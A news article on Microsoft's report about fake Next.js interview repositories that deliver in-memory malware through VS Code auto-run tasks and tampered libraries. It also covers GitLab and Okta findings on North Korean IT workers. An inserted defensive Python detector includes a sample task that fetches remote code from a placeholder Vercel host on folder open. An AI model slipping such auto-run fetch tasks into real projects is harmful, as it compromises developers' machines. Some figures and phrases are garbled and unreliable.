
Microsoft Warns Developers of Fake Next.js Test Tasks Delivering In-Memory Malware

A targeted campaign aimed at developers uses malicious repositories disguised as legitimate Next.js projects and technical tests to trick victims into running them and to gain persistent access to compromised machines.

“The task is consistent with a broad set of threats that use task header strings to intertwine with common developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.

The technology giant said the campaign is characterized by multiple entry points that converge on the same outcome: attacker-controlled JavaScript is retrieved at runtime and executed to establish command-and-control (C2).

The attack relies on threat actors setting up fake repositories on trusted developer platforms such as Bitbucket, using names like “Cryptan-Platform-MVP1” to trick job-seeking developers into working on them as part of a purported technical test.

Further analysis of the identified repositories revealed three different execution paths that, while configured differently, share the ultimate goal of executing attacker-controlled JavaScript directly in memory –

  • Visual Studio Code task execution, where VS Code projects ship a workspace task configured to run malicious code fetched from a Vercel-hosted domain as soon as the developer opens and trusts the project. The task is configured with runOn: “folderOpen”.
  • Execution during local development, where simply starting the development server with “npm run dev” is enough to trigger malicious code embedded in a modified JavaScript library (jquery.min.js), which fetches a JavaScript loader from Vercel. The returned payload is then executed in memory by Node.js.
  • Server startup with a local loader and dynamic execution of remote code, where launching the application backend executes malicious loader logic hidden inside a backend module or routing file. The loader sends process state to an external server and executes the JavaScript returned in the response in memory, inside the Node.js server process.

Microsoft noted that all three paths load the same JavaScript, which profiles the host and periodically polls a registration endpoint that hands out a unique “instanceId” identifier. That identifier is then included in subsequent polling requests so the operators can correlate activity.

The loader can also execute server-supplied JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial loader into a persistent access channel: it receives tasks by contacting a separate C2 server and executes them in memory to minimize traces left on disk.

Overview of the attack chain

“The controller maintains session stability and continuity, sends error telemetry to a reporting endpoint, and integrates logic for robustness,” Microsoft said. “It also tracks generated processes and can stop a managed task and exit cleanly when commanded. Beyond the execution of the desired code, Stage 2 supports operator detection and execution.”

Although the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a technique previously used by North Korean hackers associated with the long-running campaign known as Contagious Interview.

The ultimate goal of these efforts is to deliver malware to developer systems, which often hold sensitive data such as source code, secrets, and other information that can open the way into the target network.

Using a GitHub gist in VS Code tasks.json instead of Vercel URLs

In a report published on Wednesday, Abstract Security said it has seen a shift in the threat actors’ tactics, notably the growing use of other staging servers in VS Code task commands in place of Vercel URLs. This includes using files hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and launch the next-stage payload. Another method uses URL shorteners such as[.]gy to hide Vercel URLs.
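As an added example (not code from the original article, nor from Microsoft's or Abstract Security's reports), the following Python script checks a repository's .vscode/tasks.json for the auto-run pattern described in the bullet list above and in this paragraph: a task whose runOptions.runOn is “folderOpen” and whose command line pulls content from a remote URL, whether a Vercel domain, a GitHub gist or a shortener. The sample tasks.json documents and the placeholder Vercel subdomain are constructed for the example, and the script assumes strict JSON input (VS Code itself also tolerates comments and trailing commas).

```python
"""Flag VS Code tasks that auto-run on folder open and reference remote code.

Added defender-side example, not code from the reports the article cites.
It looks for a tasks.json entry with runOptions.runOn == "folderOpen" whose
command line pulls content from a remote URL. Assumptions: the input is
strict JSON (VS Code also accepts comments and trailing commas, which
json.loads rejects), and STAGING_HINTS is only a hint; any remote URL in an
auto-run task is reported.
"""
import json
import re
from typing import Any, Dict, List

# Staging hosts named in the article; matching one marks the finding as known.
STAGING_HINTS = ("vercel", "gist.githubusercontent.com")

URL_RE = re.compile(r"https?://[^\s\"'`<>()]+", re.IGNORECASE)


def _command_text(task: Dict[str, Any]) -> str:
    """Join the task's command and args, including per-OS override blocks."""
    parts: List[str] = [str(task.get("command", ""))]
    args = task.get("args", [])
    if isinstance(args, list):
        parts.extend(str(a) for a in args)
    # VS Code allows "windows", "linux" and "osx" blocks that override
    # command/args for that platform; a loader can be placed there too.
    for os_key in ("windows", "linux", "osx"):
        override = task.get(os_key)
        if isinstance(override, dict):
            parts.append(str(override.get("command", "")))
            os_args = override.get("args", [])
            if isinstance(os_args, list):
                parts.extend(str(a) for a in os_args)
    return " ".join(parts)


def find_auto_run_remote_tasks(tasks_json: str) -> List[Dict[str, Any]]:
    """Return one finding per folderOpen task whose command references a URL."""
    doc = json.loads(tasks_json)
    findings: List[Dict[str, Any]] = []
    for task in doc.get("tasks", []):
        run_options = task.get("runOptions") or {}
        if run_options.get("runOn") != "folderOpen":
            continue  # only auto-run tasks execute without a user action
        urls = URL_RE.findall(_command_text(task))
        if not urls:
            continue  # auto-run but local-only, e.g. "npm install"
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "urls": urls,
            "known_staging_host": any(
                hint in url.lower() for url in urls for hint in STAGING_HINTS
            ),
        })
    return findings


# Constructed sample inputs for the example; the Vercel subdomain is a placeholder.
BENIGN_TASKS_JSON = json.dumps({
    "version": "2.0.0",
    "tasks": [{
        "label": "install",
        "type": "shell",
        "command": "npm",
        "args": ["install"],
        "runOptions": {"runOn": "folderOpen"},
    }],
})

SUSPICIOUS_TASKS_JSON = json.dumps({
    "version": "2.0.0",
    "tasks": [
        {"label": "dev", "type": "shell", "command": "npm run dev"},
        {
            "label": "setup",
            "type": "shell",
            "command": "node",
            "args": ["-e", "fetch('https://placeholder-project.vercel.app/init.js')"],
            "runOptions": {"runOn": "folderOpen"},
        },
    ],
})

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_TASKS_JSON), ("suspicious", SUSPICIOUS_TASKS_JSON)):
        print(name, find_auto_run_remote_tasks(sample))
```

The benign sample is deliberately also a folderOpen task so the check does not simply treat every auto-run task as hostile; it is the combination of running without user action and reaching out to a remote URL that matches the behaviour the article describes. In a real review pipeline this would run against every `.vscode/tasks.json` in a freshly cloned repository before anyone opens it in the editor.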

The cybersecurity firm said it has also identified a malicious npm package linked to the campaign, named “eslint-validator”, that downloads and executes a payload from a Google Drive URL. The payload is a JavaScript malware known as BeaverTail.

In addition, a malicious VS Code task embedded in a GitHub repository was found to start a Windows-only infection chain in which a batch script downloads the Node.js runtime to the host (if it is not already present) and uses the certutil utility to decode a block of code embedded in the script. The decoded script is then run with the downloaded Node.js runtime to execute Python malware protected with PyArmor.

Cybersecurity firm Red Asgard, which has also been closely tracking the campaign, said that the threat actors used VS Code projects built around the runOn: “folderOpen” trigger to deliver the malware, which then queries the Polygon blockchain to retrieve JavaScript stored in an NFT contract, improving resilience. The final payload is an information stealer targeting data from web browsers, cryptocurrency wallets, and password managers.

Staging infrastructure used by North Korean threat actors in 2025

“This developer-directed campaign shows how a recruitment-themed ‘interview project’ can be a reliable way to code remotely by integrating with common workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded.

To counter the threat, the company recommends that organizations tighten trust boundaries in developer workflows, enforce strong authentication and conditional access, maintain strict authentication hygiene, apply the principle of least privilege to developer accounts and build ownership, and isolate build infrastructure where possible.

The development comes as GitLab says it has banned 131 unique accounts that were actively distributing malicious code projects linked to the Contagious Interview campaign and to an IT worker fraud scheme known as Wagemole.

“Threat actors typically originate from consumer VPNs when connecting to GitLab.com to distribute malware; however, they also occasionally originate from dedicated VPS infrastructure and mobile farm IP addresses,” said GitLab’s Oliver Smith. “Threat actors created accounts using Gmail email addresses in almost 90% of cases.”

In more than 80% of cases, according to the software development platform, threat actors abused at least six legitimate services to host malware downloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most used, with threat actors relying on the web development platform less than 49 times in 2025.

“In December, we saw a collection of projects that used malware with VS Code functions, installing remote content in a native shell or using a custom script to extract malware from binary data in a fake font file,” said Smith, confirming the above findings from Microsoft.

Checked organization chart for a North Korean IT worker cell

Another GitLab discovery was a private project “almost certainly” controlled by a North Korean state-run IT worker cell, containing detailed financial and personnel records that show salaries of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking each group’s salary per quarter.

“Records show that these operations operate as organized businesses with defined goals and operating procedures and close cross-sectional oversight,” notes GitLab. “This cell’s demonstrated ability to cultivate global influencers provides a high degree of resilience and operational flexibility for money laundering.”

A GitHub account associated with a North Korean IT worker

In a report published earlier this month, Okta said that “the majority” of interviews with IT workers do not progress to a second interview or job offer, but noted that they are “learning from their mistakes” and that many are now seeking temporary contract work as software developers through third-party staffing companies, taking advantage of the fact that these are less likely to enforce strict background checks.

“Some actors seem to be more skilled at impersonating people and passing the audition,” he added. “The natural selection type of IT Worker is in play. The most successful players are very numerous, and they organize hundreds of conversations each.”
